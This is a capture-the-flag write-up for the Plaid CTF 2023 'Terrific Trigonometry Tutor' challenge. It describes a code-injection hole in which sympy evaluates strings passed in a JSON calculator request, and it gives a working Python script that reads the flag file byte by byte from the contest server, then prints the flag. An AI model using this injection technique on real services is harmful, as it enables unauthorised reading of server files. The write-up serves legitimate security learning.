The Plaid Flag (Plaid CTF 2023)

Terrific Trigonometry Tutor

This challenge gives us a website and a source code. The goal is to read the flag.

This “calculator” uses POST request and a JSON body to do the computing.

Knowing nothing of this sympy library, I had to search the document and read it. And apparently sympy uses eval to many of it’s functions so I just need to find a way to parse string into sympy.simplify.

In postfix_calculator function, num type uses literal_eval which means I can parse string literals into the compute function.

Testing in docker environment also confirms this.

Now to the actual server.

Unfortunately, reading the entire flag is not possible, so I had to read the flag character by character.

1
2
3
4
5
6

import requests

for i in range(100):
    body = [["num",f"\"open('flag','rb').read()[{i}]\""]]
    r = requests.post('http://ttt.chal.pwni.ng:1337/compute',json=body)
    print(chr(int(r.text.split('\\')[-1])),end='')

flag:

Also the Ï was supposed to be π so… Yeah

pctf{what_be_a_pirate_math3maticians_favorite_food?_πzzarrrr___s9oolow2OOhchoh7xthi5Rae5}